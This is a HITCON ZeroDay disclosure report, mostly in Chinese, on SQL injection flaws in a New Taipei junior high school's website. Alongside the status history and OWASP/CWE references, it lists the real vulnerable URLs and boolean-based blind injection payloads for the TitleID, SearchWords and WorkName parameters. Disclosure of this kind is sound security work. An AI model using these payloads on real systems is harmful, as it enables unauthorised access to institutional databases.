Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00921
- Vendor: 新北市立福和國中
- Title: 新北市立福和國中 sqli
- Introduction: sqli
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/06/26 21:33:01 : 新提交 (由 Time Limit Exceed 更新此狀態)
- 2018/06/26 21:53:04 : 新提交 (由 Time Limit Exceed 更新此狀態)
- 2018/06/28 00:07:36 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/28 00:07:40 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/07/03 22:06:33 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/07/03 22:06:34 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/07/03 22:06:34 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/26 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00921
- 通報者:lee030792 (Time Limit Exceed)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://asp.fhjh.ntpc.edu.tw/course/Detail.asp?TitleID=%27
POST sqli:
http://asp.fhjh.ntpc.edu.tw/repair/default.asp
敘述
http://asp.fhjh.ntpc.edu.tw/course/Detail.asp?TitleID=%27(GET)
Parameter: TitleID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Payload: TitleID=-7556 OR 4471=4471%16
------------------------------------------我是分隔線---------------------------------------------------------------------
http://asp.fhjh.ntpc.edu.tw/repair/default.asp(POST)
Parameter: SearchWords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SearchWords=1%' AND 2382=2382 AND '%'='&WorkName=&x=14&y=15
Parameter: WorkName (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Payload: SearchWords=1&WorkName=-8049' OR 6956=6956%16&x=14&y=15